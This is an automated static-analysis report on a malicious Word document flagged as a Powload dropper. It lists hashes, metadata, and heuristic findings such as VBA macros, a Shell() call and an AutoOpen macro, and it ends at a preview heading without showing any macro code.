Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 33eddca30855de5a…

MALICIOUS

Office (OLE)

Size: 90.0 KB
Created: 2018-08-29 11:02:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: 5a524415a95bb6114d693fafc89361d8
SHA-1: 121f35d0cc62336fe2754d4b01f3d95eff117315
SHA-256: 33eddca30855de5a4411ed03f1b361ca31ced4de5dc4c817fd3220dd02092e8a
Risk score: 202

Heuristics (6)

  • ClamAV: Doc.Dropper.Powload-6665714-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Powload-6665714-0
  • VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]
    The document contains VBA macro code.
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    The VBA code contains a call to Shell().
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    The VBA project contains an AutoOpen macro, which runs when the document is opened.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it is not an attribution to a downloader or to a parser CVE.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels state which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; this is the standard DrawingML XML namespace URI and is expected in Office documents)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9935 bytes
SHA-256: bf6cd1fe399f23e8b7d6c07e28f6e8736a96e75d004efb1516b29c1c2ad0d5fc
Preview script (first 1,000 lines of the extracted script)